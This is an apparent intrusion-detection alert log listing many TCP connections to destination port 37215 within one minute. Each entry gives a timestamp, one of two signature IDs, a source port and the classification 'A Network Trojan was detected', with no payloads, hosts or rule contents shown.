          Timestamp:06/08/24-15:05:26.884308
          SID:2835222
          Source Port:46866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.742891
          SID:2829579
          Source Port:55172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135983
          SID:2829579
          Source Port:44750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.823008
          SID:2835222
          Source Port:34584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466249
          SID:2829579
          Source Port:40760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152792
          SID:2835222
          Source Port:57568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174387
          SID:2829579
          Source Port:42572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731866
          SID:2829579
          Source Port:33018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099503
          SID:2829579
          Source Port:38336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115986
          SID:2829579
          Source Port:58494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113891
          SID:2835222
          Source Port:37270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.258663
          SID:2829579
          Source Port:41478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.360889
          SID:2829579
          Source Port:44208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.822931
          SID:2835222
          Source Port:39694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020286
          SID:2835222
          Source Port:59350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513773
          SID:2829579
          Source Port:51914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130646
          SID:2829579
          Source Port:36986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510445
          SID:2835222
          Source Port:36074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.812981
          SID:2835222
          Source Port:40388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782617
          SID:2829579
          Source Port:44042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495733
          SID:2829579
          Source Port:34910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266165
          SID:2829579
          Source Port:54840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.233658
          SID:2829579
          Source Port:44992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240761
          SID:2835222
          Source Port:37960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110940
          SID:2835222
          Source Port:48684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135437
          SID:2835222
          Source Port:32796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.511544
          SID:2835222
          Source Port:51946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465905
          SID:2835222
          Source Port:39600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495817
          SID:2835222
          Source Port:55434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896079
          SID:2835222
          Source Port:51524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461741
          SID:2835222
          Source Port:39288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860163
          SID:2835222
          Source Port:57156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242957
          SID:2829579
          Source Port:56792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460580
          SID:2829579
          Source Port:56756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.302497
          SID:2835222
          Source Port:60754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792788
          SID:2829579
          Source Port:40480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671345
          SID:2829579
          Source Port:36068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271919
          SID:2835222
          Source Port:56910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.811632
          SID:2835222
          Source Port:50322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.835544
          SID:2829579
          Source Port:51862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730119
          SID:2835222
          Source Port:52926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460705
          SID:2829579
          Source Port:56262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240396
          SID:2835222
          Source Port:59048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.604778
          SID:2829579
          Source Port:34920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160733
          SID:2835222
          Source Port:60628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744469
          SID:2829579
          Source Port:60002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466201
          SID:2829579
          Source Port:44160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355274
          SID:2829579
          Source Port:46156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511477
          SID:2835222
          Source Port:32994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.517270
          SID:2829579
          Source Port:34246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177987
          SID:2829579
          Source Port:36024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378414
          SID:2829579
          Source Port:59236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706753
          SID:2829579
          Source Port:56954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.164408
          SID:2835222
          Source Port:54678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708609
          SID:2829579
          Source Port:43778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513690
          SID:2835222
          Source Port:49374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037294
          SID:2829579
          Source Port:37318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602861
          SID:2829579
          Source Port:33246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.862286
          SID:2835222
          Source Port:38570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.892537
          SID:2829579
          Source Port:37862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896302
          SID:2829579
          Source Port:39942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746010
          SID:2835222
          Source Port:33242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888055
          SID:2829579
          Source Port:50982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040321
          SID:2835222
          Source Port:46768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238643
          SID:2835222
          Source Port:49154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159240
          SID:2835222
          Source Port:33528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730441
          SID:2835222
          Source Port:52620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109126
          SID:2835222
          Source Port:60702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781733
          SID:2829579
          Source Port:38356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355232
          SID:2835222
          Source Port:56320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730735
          SID:2829579
          Source Port:57242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175704
          SID:2835222
          Source Port:40034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466271
          SID:2835222
          Source Port:42226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511547
          SID:2835222
          Source Port:51096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745568
          SID:2835222
          Source Port:58228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800569
          SID:2835222
          Source Port:47898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378538
          SID:2829579
          Source Port:40278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403747
          SID:2829579
          Source Port:39234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600974
          SID:2835222
          Source Port:33118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705999
          SID:2835222
          Source Port:52876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108620
          SID:2829579
          Source Port:38662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.015091
          SID:2835222
          Source Port:55386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.257676
          SID:2835222
          Source Port:40602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.056411
          SID:2835222
          Source Port:38340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129607
          SID:2835222
          Source Port:60866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269805
          SID:2829579
          Source Port:55930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038006
          SID:2835222
          Source Port:35522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158790
          SID:2829579
          Source Port:49134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396205
          SID:2835222
          Source Port:53860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270805
          SID:2835222
          Source Port:50956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273076
          SID:2829579
          Source Port:56986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461033
          SID:2829579
          Source Port:59738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017112
          SID:2835222
          Source Port:56086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.892511
          SID:2829579
          Source Port:37640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108932
          SID:2835222
          Source Port:42458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449920
          SID:2829579
          Source Port:35422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405817
          SID:2835222
          Source Port:47178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270930
          SID:2829579
          Source Port:48684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.472033
          SID:2829579
          Source Port:42938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355586
          SID:2835222
          Source Port:50804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241669
          SID:2835222
          Source Port:49536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162955
          SID:2829579
          Source Port:38962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356896
          SID:2835222
          Source Port:46030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355462
          SID:2835222
          Source Port:56332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113872
          SID:2835222
          Source Port:39178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041184
          SID:2835222
          Source Port:52892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017931
          SID:2829579
          Source Port:60272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799011
          SID:2835222
          Source Port:35316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405019
          SID:2835222
          Source Port:47072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352774
          SID:2835222
          Source Port:48680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110256
          SID:2829579
          Source Port:33690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035774
          SID:2829579
          Source Port:53164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043462
          SID:2835222
          Source Port:43638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.169396
          SID:2835222
          Source Port:56484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264877
          SID:2835222
          Source Port:41792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021439
          SID:2829579
          Source Port:34250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513045
          SID:2829579
          Source Port:37204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.169481
          SID:2835222
          Source Port:57172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745259
          SID:2835222
          Source Port:60010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517830
          SID:2829579
          Source Port:49456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792157
          SID:2829579
          Source Port:40396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745568
          SID:2835222
          Source Port:42430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731190
          SID:2829579
          Source Port:58702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.163334
          SID:2829579
          Source Port:36522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410005
          SID:2835222
          Source Port:53930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600409
          SID:2835222
          Source Port:54282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516527
          SID:2829579
          Source Port:55588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.600192
          SID:2829579
          Source Port:59070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461325
          SID:2829579
          Source Port:50830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.824407
          SID:2835222
          Source Port:54254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353707
          SID:2835222
          Source Port:44118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262724
          SID:2829579
          Source Port:59704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108029
          SID:2835222
          Source Port:60392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.075020
          SID:2829579
          Source Port:35082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127168
          SID:2829579
          Source Port:43646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115429
          SID:2835222
          Source Port:48220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673431
          SID:2835222
          Source Port:56980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239042
          SID:2835222
          Source Port:56494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463342
          SID:2829579
          Source Port:44324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732727
          SID:2835222
          Source Port:55932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789844
          SID:2835222
          Source Port:48388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405850
          SID:2829579
          Source Port:59762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.180447
          SID:2829579
          Source Port:43762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495704
          SID:2829579
          Source Port:37760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516834
          SID:2835222
          Source Port:56340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112487
          SID:2829579
          Source Port:53102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174978
          SID:2829579
          Source Port:40584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160848
          SID:2835222
          Source Port:35984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.663715
          SID:2829579
          Source Port:33378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471838
          SID:2829579
          Source Port:56590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468835
          SID:2835222
          Source Port:42834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.150368
          SID:2829579
          Source Port:60728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.163830
          SID:2835222
          Source Port:48378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.513255
          SID:2835222
          Source Port:50238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021083
          SID:2835222
          Source Port:42692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133842
          SID:2829579
          Source Port:57112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162674
          SID:2829579
          Source Port:35446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108356
          SID:2835222
          Source Port:50626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854610
          SID:2835222
          Source Port:34164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861365
          SID:2829579
          Source Port:45232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517083
          SID:2835222
          Source Port:54876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005753
          SID:2835222
          Source Port:36772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793002
          SID:2829579
          Source Port:60172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672821
          SID:2829579
          Source Port:57866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704866
          SID:2829579
          Source Port:58530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266483
          SID:2829579
          Source Port:57764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.106488
          SID:2835222
          Source Port:58122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671035
          SID:2835222
          Source Port:41216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.599735
          SID:2835222
          Source Port:50690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.152323
          SID:2835222
          Source Port:50820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546146
          SID:2835222
          Source Port:54848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707676
          SID:2835222
          Source Port:60378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108811
          SID:2829579
          Source Port:53452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042874
          SID:2835222
          Source Port:43844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.088107
          SID:2829579
          Source Port:47542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448801
          SID:2835222
          Source Port:56070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.015402
          SID:2835222
          Source Port:34406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019931
          SID:2835222
          Source Port:40792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.805965
          SID:2835222
          Source Port:53022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600057
          SID:2835222
          Source Port:54798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236647
          SID:2829579
          Source Port:56204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747861
          SID:2829579
          Source Port:41768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547827
          SID:2829579
          Source Port:43410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241201
          SID:2829579
          Source Port:42998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.806695
          SID:2835222
          Source Port:36130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449069
          SID:2835222
          Source Port:50804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160982
          SID:2829579
          Source Port:33238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.460810
          SID:2829579
          Source Port:39348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448564
          SID:2829579
          Source Port:39872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551532
          SID:2829579
          Source Port:60626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897284
          SID:2835222
          Source Port:56222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704595
          SID:2829579
          Source Port:42142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549769
          SID:2829579
          Source Port:36044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798854
          SID:2829579
          Source Port:56126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861524
          SID:2835222
          Source Port:52870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177208
          SID:2829579
          Source Port:43266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.258613
          SID:2835222
          Source Port:37846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132866
